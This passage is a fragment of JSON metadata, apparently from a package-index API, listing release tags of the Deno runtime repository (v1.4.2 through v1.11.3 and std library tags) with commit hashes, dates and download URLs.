/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"d